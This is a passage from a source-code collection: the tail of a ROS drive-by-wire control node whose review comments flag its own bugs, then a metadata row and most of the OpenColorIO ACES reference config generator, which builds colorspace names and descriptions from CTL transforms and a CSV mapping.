                                     max_lat_accel = max_lat_accel,
                                     max_steer_angle = max_steer_angle)
        # NOTE(review): duplicate subscriptions -- callbacks will fire twice.
        rospy.Subscriber('/vehicle/dbw_enabled', Bool, self.dbw_enabled_cb)
        rospy.Subscriber('/twist_cmd', TwistStamped, self.twist_cb)
        rospy.Subscriber('/current_velocity',TwistStamped,self.velocity_cb)
        # State written by the callbacks above; None until first message.
        self.current_vel = None
        self.curr_ang_vel = None
        self.dbw_enabled = None
        self.linear_vel = None
        self.angular_vel = None
        self.throttle = self.steering = self.brake = 0
        self.loop()
    def loop(self):
        """Run the 50 Hz control loop until the node is shut down."""
        rate = rospy.Rate(50)
        while not rospy.is_shutdown():
            # Only run the controller once every required input has arrived.
            if not None in (self.current_vel, self.linear_vel, self.angular_vel):
                self.throttle, self.brake, self.steering = self.controller.control(
                    self.current_vel,
                    self.dbw_enabled,
                    self.linear_vel,
                    self.angular_vel)
            # Publish only while drive-by-wire is engaged.
            if self.dbw_enabled:
                self.publish(self.throttle, self.brake, self.steering)
            rate.sleep()
    def dbw_enabled_cb(self, msg):
        # NOTE(review): stores the Bool message object, not msg.data.
        self.dbw_enabled = msg
    def twist_cb(self, msg):
        """Record the proposed linear/angular velocities."""
        self.linear_vel = msg.twist.linear.x
        self.angular_vel = msg.twist.angular.z
    def velocity_cb(self, msg):
        """Record the measured forward velocity."""
        self.current_vel = msg.twist.linear.x
    def publish(self, throttle, brake, steer):
        """Publish one set of throttle, brake and steering commands."""
        tcmd = ThrottleCmd()
        tcmd.enable = True
        tcmd.pedal_cmd_type = ThrottleCmd.CMD_PERCENT
        tcmd.pedal_cmd = throttle
        self.throttle_pub.publish(tcmd)
        scmd = SteeringCmd()
        scmd.enable = True
        scmd.steering_wheel_angle_cmd = steer
        self.steer_pub.publish(scmd)
        bcmd = BrakeCmd()
        bcmd.enable = True
        bcmd.pedal_cmd_type = BrakeCmd.CMD_TORQUE
        bcmd.pedal_cmd = brake
        self.brake_pub.publish(bcmd)
    def current_msg_cb(self, message):
        """Record the measured forward velocity (from "/current_vel")."""
        self.current_vel = message.twist.linear.x
    def final_waypoints_cb(self, message):
        """Cache the most recent list of final waypoints."""
        self.final_waypoints = message.waypoints
    def current_pose_cb(self, message):
        """Cache the most recent vehicle pose."""
        self.current_pose = message
if __name__ == '__main__':
    # Constructing the node enters DBWNode.loop(), which blocks until
    # rospy shutdown.
    DBWNode()
f70fff870565855a3fc51fd9d30f07cd0448c020 | 36,690 | py | Python | opencolorio_config_aces/config/reference/generate/config.py | rdaniels29/OpenColorIO-Config-ACES | ed0d77ad47fd50ad6e71813980d589b2b44cf272 | [
"BSD-3-Clause"
] | null | null | null | opencolorio_config_aces/config/reference/generate/config.py | rdaniels29/OpenColorIO-Config-ACES | ed0d77ad47fd50ad6e71813980d589b2b44cf272 | [
"BSD-3-Clause"
] | null | null | null | opencolorio_config_aces/config/reference/generate/config.py | rdaniels29/OpenColorIO-Config-ACES | ed0d77ad47fd50ad6e71813980d589b2b44cf272 | [
"BSD-3-Clause"
] | null | null | null | # SPDX-License-Identifier: BSD-3-Clause
# Copyright Contributors to the OpenColorIO Project.
"""
*aces-dev* Reference Config Generator
=====================================
Defines various objects related to the generation of the *aces-dev* reference
*OpenColorIO* config:
- :func:`opencolorio_config_aces.generate_config_aces`
"""
import csv
import logging
import re
from collections import defaultdict
from datetime import datetime
from enum import Flag, auto
from pathlib import Path
from opencolorio_config_aces.config.generation import (
ConfigData, colorspace_factory, generate_config, look_factory,
view_transform_factory)
from opencolorio_config_aces.config.reference import (
classify_aces_ctl_transforms, discover_aces_ctl_transforms,
unclassify_ctl_transforms)
from opencolorio_config_aces.utilities import git_describe, required
__author__ = 'OpenColorIO Contributors'
__copyright__ = 'Copyright Contributors to the OpenColorIO Project.'
__license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause'
__maintainer__ = 'OpenColorIO Contributors'
__email__ = 'ocio-dev@lists.aswf.io'
__status__ = 'Production'
__all__ = [
'ACES_CONFIG_REFERENCE_MAPPING_FILE_PATH',
'ACES_CONFIG_REFERENCE_COLORSPACE',
'ACES_CONFIG_OUTPUT_ENCODING_COLORSPACE',
'ACES_CONFIG_COLORSPACE_NAME_SEPARATOR',
'ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR',
'ACES_CONFIG_BUILTIN_TRANSFORM_NAME_SEPARATOR',
'ACES_CONFIG_DISPLAY_FAMILY', 'COLORSPACE_NAME_SUBSTITUTION_PATTERNS',
'LOOK_NAME_SUBSTITUTION_PATTERNS',
'TRANSFORM_FAMILY_SUBSTITUTION_PATTERNS',
'VIEW_TRANSFORM_NAME_SUBSTITUTION_PATTERNS',
'DISPLAY_NAME_SUBSTITUTION_PATTERNS', 'ColorspaceDescriptionStyle',
'beautify_name', 'beautify_colorspace_name', 'beautify_look_name',
'beautify_transform_family', 'beautify_view_transform_name',
'beautify_display_name', 'ctl_transform_to_colorspace_name',
'ctl_transform_to_look_name', 'ctl_transform_to_transform_family',
'ctl_transform_to_description', 'ctl_transform_to_colorspace',
'ctl_transform_to_look', 'create_builtin_transform',
'style_to_view_transform', 'style_to_display_colorspace',
'generate_config_aces'
]
ACES_CONFIG_REFERENCE_MAPPING_FILE_PATH = (
Path(__file__).parents[0] / 'resources' /
'OpenColorIO-ACES-Config Transforms - Reference Config - Mapping.csv')
"""
Path to the *ACES* *CTL* transforms to *OpenColorIO* colorspaces mapping file.
ACES_CONFIG_REFERENCE_MAPPING_FILE_PATH : unicode
"""
ACES_CONFIG_REFERENCE_COLORSPACE = 'ACES2065-1'
"""
*OpenColorIO* config reference colorspace.
ACES_CONFIG_REFERENCE_COLORSPACE : unicode
"""
ACES_CONFIG_OUTPUT_ENCODING_COLORSPACE = 'OCES'
"""
*OpenColorIO* config output encoding colorspace.
ACES_CONFIG_OUTPUT_ENCODING_COLORSPACE : unicode
"""
ACES_CONFIG_COLORSPACE_NAME_SEPARATOR = ' - '
"""
*OpenColorIO* config colorspace name separator.
ACES_CONFIG_COLORSPACE_NAME_SEPARATOR : unicode
"""
ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR = '/'
"""
*OpenColorIO* config colorspace family separator.
ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR : unicode
"""
ACES_CONFIG_BUILTIN_TRANSFORM_NAME_SEPARATOR = '_to_'
"""
*OpenColorIO* config *BuiltinTransform* name separator.
ACES_CONFIG_BUILTIN_TRANSFORM_NAME_SEPARATOR : unicode
"""
ACES_CONFIG_DISPLAY_FAMILY = 'Display'
"""
*OpenColorIO* config display family.
ACES_CONFIG_DISPLAY_FAMILY : unicode
"""
COLORSPACE_NAME_SUBSTITUTION_PATTERNS = {
'ACES_0_1_1': 'ACES 0.1.1',
'ACES_0_2_2': 'ACES 0.2.2',
'ACES_0_7_1': 'ACES 0.7.1',
'_7nits': '',
'_15nits': '',
'_': ' ',
'-raw': '',
'-': ' ',
'\\b(\\w+)limited\\b': '(\\1 Limited)',
'\\b(\\d+)nits\\b': '(\\1 nits)',
'RGBmonitor': 'sRGB',
'Rec709': 'Rec. 709',
'Rec2020': 'Rec. 2020',
}
"""
*OpenColorIO* colorspace name substitution patterns.
Notes
-----
- The substitutions are evaluated in order.
COLORSPACE_NAME_SUBSTITUTION_PATTERNS : dict
"""
COLORSPACE_NAME_SUBSTITUTION_PATTERNS.update({
# Input transforms also use the "family" name and thus need beautifying.
(f'{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}Alexa'
f'{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}v\\d+'
f'{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}.*'):
'',
f'{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}':
ACES_CONFIG_COLORSPACE_NAME_SEPARATOR,
})
LOOK_NAME_SUBSTITUTION_PATTERNS = {
# TODO: Implement support for callable patterns.
# The following one should be a dedicated definition/callable.
'BlueLightArtifactFix': 'Blue Light Artifact Fix'
}
"""
*OpenColorIO* look name substitution patterns.
Notes
-----
- The substitutions are evaluated in order.
LOOK_NAME_SUBSTITUTION_PATTERNS : dict
"""
TRANSFORM_FAMILY_SUBSTITUTION_PATTERNS = {
'\\\\': ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR,
'vendorSupplied[/\\\\]': '',
'arri': 'ARRI',
'alexa': 'Alexa',
'canon': 'Canon',
'panasonic': 'Panasonic',
'red': 'RED',
'sony': 'Sony',
}
"""
*OpenColorIO* transform family substitution patterns.
Notes
-----
- The substitutions are evaluated in order.
TRANSFORM_FAMILY_SUBSTITUTION_PATTERNS : dict
"""
VIEW_TRANSFORM_NAME_SUBSTITUTION_PATTERNS = {
'7.2nit': '&',
'15nit': '&',
'lim': ' lim',
'nit': ' nits',
'sim': ' sim on',
'CINEMA': 'Cinema',
'VIDEO': 'Video',
'REC1886': 'Rec.1886',
'REC709': 'Rec.709',
'REC2020': 'Rec.2020',
'-': ' ',
}
"""
*OpenColorIO* view transform name substitution patterns.
VIEW_TRANSFORM_NAME_SUBSTITUTION_PATTERNS : dict
"""
DISPLAY_NAME_SUBSTITUTION_PATTERNS = {
'G2.6-': '',
'-BFD': '',
'REC.1886': 'Rec.1886',
'REC.709': 'Rec.709 Video',
'REC.2020': 'Rec.2020 Video',
'REC.2100': 'Rec.2100',
'-Rec.': ' / Rec.',
'-1000nit': '',
# Legacy Substitutions
'dcdm': 'DCDM',
'p3': 'P3',
'rec709': 'Rec. 709',
'rec2020': 'Rec. 2020',
}
"""
*OpenColorIO* display name substitution patterns.
Notes
-----
- The substitutions are evaluated in order.
DISPLAY_NAME_SUBSTITUTION_PATTERNS : dict
"""
class ColorspaceDescriptionStyle(Flag):
    """
    Enum storing the various *OpenColorIO* colorspace description styles.
    """
    # No description is generated at all.
    NONE = auto()
    # Include the "ACEStransformID" / *CTL* transform description.
    ACES = auto()
    # Include the description of the *OpenColorIO* builtin transform.
    OPENCOLORIO = auto()
    # Short form: only the "ACEStransformID" line.
    SHORT = auto()
    # Long form: the full *CTL* transform description.
    LONG = auto()
    SHORT_UNION = ACES | OPENCOLORIO | SHORT
    LONG_UNION = ACES | OPENCOLORIO | LONG
def beautify_name(name, patterns):
    """
    Beautifies given name by applying in succession the given patterns.

    Parameters
    ----------
    name : unicode
        Name to beautify.
    patterns : dict
        Dictionary of regular expression patterns and substitution to apply
        onto the name.

    Returns
    -------
    unicode
        Beautified name.

    Examples
    --------
    >>> beautify_name(
    ...     'Rec709_100nits_dim',
    ...     COLORSPACE_NAME_SUBSTITUTION_PATTERNS)
    'Rec. 709 (100 nits) dim'
    """
    # Substitutions are order-dependent: each pattern is applied to the
    # result of the previous one.
    beautified = name
    for pattern, replacement in patterns.items():
        beautified = re.sub(pattern, replacement, beautified)
    return beautified.strip()
def beautify_colorspace_name(name):
    """
    Beautifies given *OpenColorIO* colorspace name using the colorspace
    name substitution patterns.

    Parameters
    ----------
    name : unicode
        *OpenColorIO* colorspace name to beautify.

    Returns
    -------
    unicode
        Beautified *OpenColorIO* colorspace name.

    Examples
    --------
    >>> beautify_colorspace_name('Rec709_100nits_dim')
    'Rec. 709 (100 nits) dim'
    """
    # Delegate to the generic beautifier with the colorspace-specific
    # pattern table.
    patterns = COLORSPACE_NAME_SUBSTITUTION_PATTERNS
    return beautify_name(name, patterns)
def beautify_look_name(name):
    """
    Beautifies given *OpenColorIO* look name using the look name
    substitution patterns.

    Parameters
    ----------
    name : unicode
        *OpenColorIO* look name to beautify.

    Returns
    -------
    unicode
        Beautified *OpenColorIO* look name.

    Examples
    --------
    >>> beautify_look_name('BlueLightArtifactFix')
    'Blue Light Artifact Fix'
    """
    # Delegate to the generic beautifier with the look-specific pattern
    # table.
    patterns = LOOK_NAME_SUBSTITUTION_PATTERNS
    return beautify_name(name, patterns)
def beautify_transform_family(name):
    """
    Beautifies given *OpenColorIO* colorspace family using the transform
    family substitution patterns.

    Parameters
    ----------
    name : unicode
        *OpenColorIO* colorspace family to beautify.

    Returns
    -------
    unicode
        Beautified *OpenColorIO* colorspace family.

    Examples
    --------
    >>> beautify_transform_family('vendorSupplied/arri/alexa/v3/EI800')
    'ARRI/Alexa/v3/EI800'
    """
    # Delegate to the generic beautifier with the family-specific pattern
    # table.
    patterns = TRANSFORM_FAMILY_SUBSTITUTION_PATTERNS
    return beautify_name(name, patterns)
def beautify_view_transform_name(name):
    """
    Beautifies given *OpenColorIO* view transform name by applying in
    succession the relevant patterns.

    Parameters
    ----------
    name : unicode
        *OpenColorIO* view transform name to beautify.

    Returns
    -------
    unicode
        Beautified *OpenColorIO* view transform name.

    Examples
    --------
    >>> beautify_view_transform_name(
    ...     'ACES-OUTPUT - ACES2065-1_to_CIE-XYZ-D65 - SDR-CINEMA_1.0')
    'Output - SDR Cinema - ACES 1.0'
    """
    # Keep only the trailing "<basename>_<version>" token of the name.
    last_token = name.split(ACES_CONFIG_COLORSPACE_NAME_SEPARATOR)[-1]
    basename, version = last_token.split('_')

    # A basename with more than two "-" separated tokens encodes an extra
    # genus, e.g. "SDR-CINEMA-REC709lim" -> family "SDR-CINEMA",
    # genus "REC709lim".
    tokens = basename.split('-')
    if len(tokens) > 2:
        family = beautify_name('-'.join(tokens[:2]),
                               VIEW_TRANSFORM_NAME_SUBSTITUTION_PATTERNS)
        genus = beautify_name('-'.join(tokens[2:]),
                              VIEW_TRANSFORM_NAME_SUBSTITUTION_PATTERNS)
        return f'Output - {family} ({genus}) - ACES {version}'

    family = beautify_name(basename,
                           VIEW_TRANSFORM_NAME_SUBSTITUTION_PATTERNS)
    return f'Output - {family} - ACES {version}'
def beautify_display_name(name):
    """
    Beautifies given *OpenColorIO* display name by applying in succession
    the relevant patterns.

    Parameters
    ----------
    name : unicode
        *OpenColorIO* display name to beautify.

    Returns
    -------
    unicode
        Beautified *OpenColorIO* display name.

    Examples
    --------
    >>> beautify_display_name('DISPLAY - CIE-XYZ-D65_to_sRGB')
    'Display - sRGB'
    >>> beautify_display_name('rec709')
    'Display - Rec. 709'
    """
    # Only the part after the last "_to_" identifies the actual display.
    display = name.split(ACES_CONFIG_BUILTIN_TRANSFORM_NAME_SEPARATOR)[-1]
    display = beautify_name(display, DISPLAY_NAME_SUBSTITUTION_PATTERNS)
    return f'Display - {display}'
def ctl_transform_to_colorspace_name(ctl_transform):
    """
    Generates the *OpenColorIO* colorspace name for given *ACES* *CTL*
    transform.

    Parameters
    ----------
    ctl_transform : CTLTransform
        *ACES* *CTL* transform to generate the *OpenColorIO* colorspace name
        for.

    Returns
    -------
    unicode
        *OpenColorIO* colorspace name.
    """
    # Pick whichever end of the transform is not one of the connection
    # colorspaces.
    connection_spaces = (ACES_CONFIG_REFERENCE_COLORSPACE,
                         ACES_CONFIG_OUTPUT_ENCODING_COLORSPACE)
    name = (ctl_transform.target
            if ctl_transform.source in connection_spaces else
            ctl_transform.source)
    return beautify_colorspace_name(name)
def ctl_transform_to_look_name(ctl_transform):
    """
    Generates the *OpenColorIO* look name for given *ACES* *CTL* transform.

    Parameters
    ----------
    ctl_transform : CTLTransform
        *ACES* *CTL* transform to generate the *OpenColorIO* look name for.

    Returns
    -------
    unicode
        *OpenColorIO* look name.
    """
    # Pick whichever end of the transform is not one of the connection
    # colorspaces.
    connection_spaces = (ACES_CONFIG_REFERENCE_COLORSPACE,
                         ACES_CONFIG_OUTPUT_ENCODING_COLORSPACE)
    name = (ctl_transform.target
            if ctl_transform.source in connection_spaces else
            ctl_transform.source)
    return beautify_look_name(name)
def ctl_transform_to_transform_family(ctl_transform, analytical=True):
    """
    Generates the *OpenColorIO* transform family for given *ACES* *CTL*
    transform.

    Parameters
    ----------
    ctl_transform : CTLTransform
        *ACES* *CTL* transform to generate the *OpenColorIO* transform family
        for.
    analytical : bool, optional
        Whether to generate the *OpenColorIO* transform family that
        analytically matches the given *ACES* *CTL* transform, i.e. true to
        the *aces-dev* reference but not necessarily user friendly.

    Returns
    -------
    unicode
        *OpenColorIO* transform family.

    Raises
    ------
    ValueError
        If the *ACES* *CTL* transform family is not handled.
    """
    # The "analytical" and user friendly code paths only differ for the
    # "Academy" colour space conversion transforms; the duplicated branches
    # of the original implementation are merged accordingly.
    if (ctl_transform.family == 'csc'
            and ctl_transform.namespace == 'Academy'):
        if analytical:
            family = 'CSC'
        elif re.match('ACES|ADX', ctl_transform.name):
            # User friendly grouping of the "Academy" colorspaces.
            family = 'ACES'
        else:
            family = (f'Input{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}'
                      f'{ctl_transform.genus}')
    elif ctl_transform.family == 'input_transform':
        family = (f'Input{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}'
                  f'{ctl_transform.genus}')
    elif ctl_transform.family == 'output_transform':
        family = 'Output'
    elif ctl_transform.family == 'lmt':
        family = 'LMT'
    else:
        # The original implementation left "family" unbound here and crashed
        # with an "UnboundLocalError"; fail explicitly instead.
        raise ValueError(
            f'"{ctl_transform.family}" family is not handled!')
    return beautify_transform_family(family)
@required('OpenColorIO')
def ctl_transform_to_description(
        ctl_transform,
        describe=ColorspaceDescriptionStyle.LONG_UNION,
        factory=colorspace_factory,
        **kwargs):
    """
    Generates the *OpenColorIO* colorspace or look description for given
    *ACES* *CTL* transform.
    Parameters
    ----------
    ctl_transform : CTLTransform
        *ACES* *CTL* transform to generate the *OpenColorIO* colorspace for.
    describe : bool, optional
        Whether to use the full *ACES* *CTL* transform description or just the
        first line.
    factory : callable, optional
        Factory used to adjust the code paths because of slight difference
        of signature between the *OpenColorIO* colorspace and look.
    Other Parameters
    ----------------
    \\**kwargs : dict, optional
        Keywords arguments for the
        :func:`opencolorio_config_aces.colorspace_factory` definition.
    Returns
    -------
    unicode
        *OpenColorIO* colorspace or look description.
    """
    import PyOpenColorIO as ocio
    description = None
    if describe != ColorspaceDescriptionStyle.NONE:
        description = []
        # *OpenColorIO* part of the description, taken from the
        # "BuiltinTransform" when one was passed via "kwargs".
        if describe in (ColorspaceDescriptionStyle.OPENCOLORIO,
                        ColorspaceDescriptionStyle.SHORT_UNION,
                        ColorspaceDescriptionStyle.LONG_UNION):
            # Colorspaces and looks name their transform keyword arguments
            # differently, hence the "factory" based selection.
            forward, inverse = ([
                'to_reference',
                'from_reference',
            ] if factory is colorspace_factory else [
                'forward_transform',
                'inverse_transform',
            ])
            transforms = [
                transform for transform in (kwargs.get(forward),
                                            kwargs.get(inverse))
                if transform is not None
            ]
            # Prefer the forward transform, fall back to the inverse one.
            transform = next(iter(transforms), None)
            if isinstance(transform, ocio.BuiltinTransform):
                description.append(transform.getDescription())
        # *ACES* *CTL* part of the description.
        if describe in (ColorspaceDescriptionStyle.ACES,
                        ColorspaceDescriptionStyle.ACES
                        | ColorspaceDescriptionStyle.SHORT,
                        ColorspaceDescriptionStyle.SHORT_UNION,
                        ColorspaceDescriptionStyle.LONG_UNION):
            # Blank line separating the two description parts.
            if len(description) > 0:
                description.append('')
            aces_transform_id = (
                ctl_transform.aces_transform_id.aces_transform_id)
            # Short styles only quote the "ACEStransformID"; long styles
            # embed the full *CTL* transform description.
            if describe in (ColorspaceDescriptionStyle.ACES,
                            ColorspaceDescriptionStyle.ACES
                            | ColorspaceDescriptionStyle.SHORT,
                            ColorspaceDescriptionStyle.SHORT_UNION):
                description.append(f'ACEStransformID: {aces_transform_id}')
            else:
                description.append('CTL Transform')
                description.append(f'{"=" * len(description[-1])}\n')
                description.append(f'{ctl_transform.description}\n')
                description.append(f'ACEStransformID: {aces_transform_id}')
        description = '\n'.join(description)
    return description
def ctl_transform_to_colorspace(ctl_transform,
                                describe=ColorspaceDescriptionStyle.LONG_UNION,
                                analytical=True,
                                **kwargs):
    """
    Generates the *OpenColorIO* colorspace for given *ACES* *CTL* transform.

    Parameters
    ----------
    ctl_transform : CTLTransform
        *ACES* *CTL* transform to generate the *OpenColorIO* colorspace for.
    describe : bool, optional
        Whether to use the full *ACES* *CTL* transform description or just
        the first line.
    analytical : bool, optional
        Whether to generate the *OpenColorIO* transform family that
        analytically matches the given *ACES* *CTL* transform, i.e. true to
        the *aces-dev* reference but not necessarily user friendly.

    Other Parameters
    ----------------
    \\**kwargs : dict, optional
        Keywords arguments for the
        :func:`opencolorio_config_aces.colorspace_factory` definition.

    Returns
    -------
    ColorSpace
        *OpenColorIO* colorspace.
    """
    base_name = ctl_transform_to_colorspace_name(ctl_transform)
    family = ctl_transform_to_transform_family(ctl_transform, analytical)
    description = ctl_transform_to_description(ctl_transform, describe,
                                               colorspace_factory, **kwargs)

    # "<Beautified Family> - <Name>" is the canonical colorspace name.
    settings = {
        'name': ACES_CONFIG_COLORSPACE_NAME_SEPARATOR.join(
            [beautify_colorspace_name(family), base_name]),
        'family': family,
        'description': description,
    }
    # Caller-supplied keyword arguments override the defaults above.
    settings.update(kwargs)

    return colorspace_factory(**settings)
def ctl_transform_to_look(ctl_transform,
                          describe=ColorspaceDescriptionStyle.LONG_UNION,
                          analytical=True,
                          **kwargs):
    """
    Generates the *OpenColorIO* look for given *ACES* *CTL* transform.

    Parameters
    ----------
    ctl_transform : CTLTransform
        *ACES* *CTL* transform to generate the *OpenColorIO* look for.
    describe : bool, optional
        Whether to use the full *ACES* *CTL* transform description or just
        the first line.
    analytical : bool, optional
        Whether to generate the *OpenColorIO* transform family that
        analytically matches the given *ACES* *CTL* transform, i.e. true to
        the *aces-dev* reference but not necessarily user friendly.

    Other Parameters
    ----------------
    \\**kwargs : dict, optional
        Keywords arguments for the
        :func:`opencolorio_config_aces.look_factory` definition.

    Returns
    -------
    ColorSpace
        *OpenColorIO* look.
    """
    base_name = ctl_transform_to_look_name(ctl_transform)
    family = ctl_transform_to_transform_family(ctl_transform, analytical)
    description = ctl_transform_to_description(ctl_transform, describe,
                                               look_factory, **kwargs)

    # "<Beautified Family> - <Name>" is the canonical look name; unlike
    # colorspaces, looks do not carry a "family" attribute.
    settings = {
        'name': ACES_CONFIG_COLORSPACE_NAME_SEPARATOR.join(
            [beautify_colorspace_name(family), base_name]),
        'description': description,
    }
    # Caller-supplied keyword arguments override the defaults above.
    settings.update(kwargs)

    return look_factory(**settings)
@required('OpenColorIO')
def create_builtin_transform(style):
    """
    Creates an *OpenColorIO* builtin transform for given style.

    If the style does not exist, a placeholder transform is used in place
    of the builtin transform.

    Parameters
    ----------
    style : unicode
        *OpenColorIO* builtin transform style

    Returns
    -------
    BuiltinTransform
        *OpenColorIO* builtin transform for given style.
    """
    import PyOpenColorIO as ocio

    builtin_transform = ocio.BuiltinTransform()
    try:
        builtin_transform.setStyle(style)
    except ocio.Exception:
        # Lazy %-style arguments defer string interpolation until the record
        # is actually emitted (idiomatic logging usage).
        logging.warning(
            '%s style is not defined, '
            'using a placeholder "FileTransform" instead!', style)
        # The unknown style is stashed as the "src" attribute so that it
        # remains discoverable in the generated config.
        builtin_transform = ocio.FileTransform()
        builtin_transform.setSrc(style)
    return builtin_transform
@required('OpenColorIO')
def style_to_view_transform(style,
                            ctl_transforms,
                            describe=ColorspaceDescriptionStyle.LONG_UNION):
    """
    Creates an *OpenColorIO* view transform for given style.

    Parameters
    ----------
    style : unicode
        *OpenColorIO* builtin transform style
    ctl_transforms : array_like
        Array of :class:`opencolorio_config_aces.config.reference.CTLTransform`
        class instances corresponding to the given style.
    describe : int, optional
        Any value from the
        :class:`opencolorio_config_aces.ColorspaceDescriptionStyle` enum.

    Returns
    -------
    ViewTransform
        *OpenColorIO* view transform for given style.
    """

    import PyOpenColorIO as ocio

    name = beautify_view_transform_name(style)
    builtin_transform = ocio.BuiltinTransform(style)

    # The description is assembled incrementally; note that the "in" tests
    # below compare against tuples of composed "Flag" values, i.e. they are
    # equality checks on the exact style, not bitwise containment tests.
    description = None
    if describe != ColorspaceDescriptionStyle.NONE:
        description = []
        # "OpenColorIO" description taken from the builtin transform itself.
        if describe in (ColorspaceDescriptionStyle.OPENCOLORIO,
                        ColorspaceDescriptionStyle.SHORT_UNION,
                        ColorspaceDescriptionStyle.LONG_UNION):
            description.append(builtin_transform.getDescription())
        # "ACES" description built from the matching "CTL" transforms.
        if describe in (ColorspaceDescriptionStyle.ACES,
                        ColorspaceDescriptionStyle.ACES
                        | ColorspaceDescriptionStyle.SHORT,
                        ColorspaceDescriptionStyle.SHORT_UNION,
                        ColorspaceDescriptionStyle.LONG_UNION):
            # Pairing every "ACEStransformID" with its "CTL" description.
            aces_transform_ids, aces_descriptions = zip(
                *[(ctl_transform.aces_transform_id.aces_transform_id,
                   ctl_transform.description)
                  for ctl_transform in ctl_transforms])
            # Blank separator between the "OpenColorIO" and "ACES" sections.
            if len(description) > 0:
                description.append('')
            if describe in (ColorspaceDescriptionStyle.ACES
                            | ColorspaceDescriptionStyle.SHORT,
                            ColorspaceDescriptionStyle.SHORT_UNION):
                # Short style: only the "ACEStransformID" identifiers.
                description.extend([
                    f'ACEStransformID: {aces_transform_id}'
                    for aces_transform_id in aces_transform_ids
                ])
            else:
                # Long style: a titled section with every "CTL" transform
                # description, separated by horizontal rules.
                description.append(
                    f'CTL Transform'
                    f'{"s" if len(aces_transform_ids) >= 2 else ""}')
                description.append(f'{"=" * len(description[-1])}\n')
                description.append(f'\n{"-" * 80}\n\n'.join([
                    (f'{aces_descriptions[i]}\n\n'
                     f'ACEStransformID: {aces_transform_id}\n')
                    for i, aces_transform_id in enumerate(aces_transform_ids)
                ]))
            description = '\n'.join(description)

    view_transform = view_transform_factory(
        name, from_reference=builtin_transform, description=description)

    return view_transform
@required('OpenColorIO')
def style_to_display_colorspace(
        style, describe=ColorspaceDescriptionStyle.OPENCOLORIO, **kwargs):
    """
    Creates an *OpenColorIO* display colorspace for given style.

    Parameters
    ----------
    style : unicode
        *OpenColorIO* builtin transform style
    describe : int, optional
        Any value from the
        :class:`opencolorio_config_aces.ColorspaceDescriptionStyle` enum.

    Other Parameters
    ----------------
    \\**kwargs : dict, optional
        Keywords arguments for the
        :func:`opencolorio_config_aces.colorspace_factory` definition.

    Returns
    -------
    ColorSpace
        *OpenColorIO* display colorspace for given style.
    """

    import PyOpenColorIO as ocio

    # Because "kwargs" is merged into "settings" below, this defaulted entry
    # (not the literal in "settings") is the value that effectively wins.
    kwargs.setdefault('family', ACES_CONFIG_DISPLAY_FAMILY)

    name = beautify_display_name(style)
    builtin_transform = ocio.BuiltinTransform(style)

    description = None
    if describe != ColorspaceDescriptionStyle.NONE:
        description = []
        if describe in (ColorspaceDescriptionStyle.OPENCOLORIO,
                        ColorspaceDescriptionStyle.SHORT_UNION,
                        ColorspaceDescriptionStyle.LONG_UNION):
            description.append(builtin_transform.getDescription())
        description = '\n'.join(description)

    # The colorspace is defined from the display connection space, hence the
    # "REFERENCE_SPACE_DISPLAY" reference space.
    settings = {
        'name': name,
        'family': ACES_CONFIG_DISPLAY_FAMILY,
        'description': description,
        'from_reference': builtin_transform,
        'reference_space': ocio.REFERENCE_SPACE_DISPLAY,
    }
    settings.update(kwargs)

    colorspace = colorspace_factory(**settings)

    return colorspace
@required('OpenColorIO')
def generate_config_aces(
        config_name=None,
        validate=True,
        describe=ColorspaceDescriptionStyle.SHORT_UNION,
        config_mapping_file_path=ACES_CONFIG_REFERENCE_MAPPING_FILE_PATH,
        analytical=True,
        additional_data=False):
    """
    Generates the *aces-dev* reference implementation *OpenColorIO* Config
    using the *Mapping* method.

    The Config generation is constrained by a *CSV* file exported from the
    *Reference Config - Mapping* sheet from a
    `Google Sheets file <https://docs.google.com/spreadsheets/d/\
1SXPt-USy3HlV2G2qAvh9zit6ZCINDOlfKT07yXJdWLg>`__. The *Google Sheets* file
    was originally authored using the output of the *aces-dev* conversion graph
    to support the discussions of the *OpenColorIO* *Working Group* on the
    design of the *aces-dev* reference implementation *OpenColorIO* Config.
    The resulting mapping is the outcome of those discussions and leverages the
    new *OpenColorIO 2* display architecture while factoring many transforms.

    Parameters
    ----------
    config_name : unicode, optional
        *OpenColorIO* config file name, if given the config will be written to
        disk.
    validate : bool, optional
        Whether to validate the config.
    describe : int, optional
        Any value from the
        :class:`opencolorio_config_aces.ColorspaceDescriptionStyle` enum.
    config_mapping_file_path : unicode, optional
        Path to the *CSV* mapping file used by the *Mapping* method.
    analytical : bool, optional
        Whether to generate *OpenColorIO* transform families that analytically
        match the given *ACES* *CTL* transform, i.e. true to the *aces-dev*
        reference but not necessarily user friendly.
    additional_data : bool, optional
        Whether to return additional data.

    Returns
    -------
    Config or tuple
        *OpenColorIO* config or tuple of *OpenColorIO* config,
        :class:`opencolorio_config_aces.ConfigData` class instance and dict of
        *OpenColorIO* colorspaces and
        :class:`opencolorio_config_aces.config.reference.CTLTransform` class
        instances.
    """

    import PyOpenColorIO as ocio

    # Discovering, classifying then flattening the "aces-dev" "CTL"
    # transforms so they can be looked up by "ACEStransformID".
    ctl_transforms = unclassify_ctl_transforms(
        classify_aces_ctl_transforms(discover_aces_ctl_transforms()))
    builtin_transforms = [
        builtin for builtin in ocio.BuiltinTransformRegistry()
    ]
    # Parsing the *CSV* mapping file, grouping its rows by their
    # "BuiltinTransform" style.
    config_mapping = defaultdict(list)
    with open(config_mapping_file_path) as csv_file:
        dict_reader = csv.DictReader(
            csv_file,
            delimiter=',',
            fieldnames=[
                'ordering',
                'aces_transform_id',
                'builtin_transform_style',
                'linked_display_colorspace_style',
                'interface',
                'encoding',
                'categories',
            ])
        # Skipping the first header line.
        next(dict_reader)
        for transform_data in dict_reader:
            # Checking whether the "BuiltinTransform" style exists.
            style = transform_data['builtin_transform_style']
            if style:
                assert (style in builtin_transforms), (
                    f'"{style}" "BuiltinTransform" style does not '
                    f'exist!')
            # Checking whether the linked "DisplayColorspace"
            # "BuiltinTransform" style exists.
            style = transform_data['linked_display_colorspace_style']
            if style:
